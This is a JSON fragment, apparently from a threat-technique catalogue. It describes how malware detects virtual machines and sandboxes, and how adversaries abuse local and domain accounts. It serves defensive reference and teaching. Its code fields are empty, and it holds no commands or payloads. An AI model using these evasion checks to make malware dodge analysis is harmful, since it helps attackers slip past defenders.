"description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.\r\n\r\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.\r\n\r\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.\r\n\r\nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1497/001/",
"creation_date": "2023-03-20T23:50:55.107000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME) detection,\r\nsandbox detection,\r\nVME artifacts,\r\nWindows Management Instrumentation, \r\nPowerShell, \r\nSystem Information Discovery, \r\nQuery Registry ,\r\nhost/domain name,\r\nnetwork traffic,\r\nhardware info,\r\nVMWare,\r\nvirtualisation,",
"modification_date": "2023-10-04T10:43:55.298000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 346,
"key": "valid-accounts-local-accounts",
"unprotect_id": "T1078.003",
"name": "Valid Accounts: Local Accounts",
"description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\r\n\r\nLocal Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1078/003/",
"creation_date": "2023-03-20T23:47:08.395000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nOS Credential Dumping,\r\nPassword reuse,\r\nweak passwords,\r\nlateral movement,",
"modification_date": "2023-10-04T10:44:50.140000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 345,
"key": "valid-accounts-domain-accounts",
"unprotect_id": "T1078.002",
"name": "Valid Accounts: Domain Accounts",
"description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\r\n\r\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1078/002/",
"creation_date": "2023-03-20T23:45:20.275000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nActive Directory Domain Services,\r\nOS Credential Dumping,\r\npassword reuse,\r\nweak passwords,\r\nprivileged domain resources,\r\nlateral movement,",
"modification_date": "2023-10-04T10:43:30.236000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
}
]
}
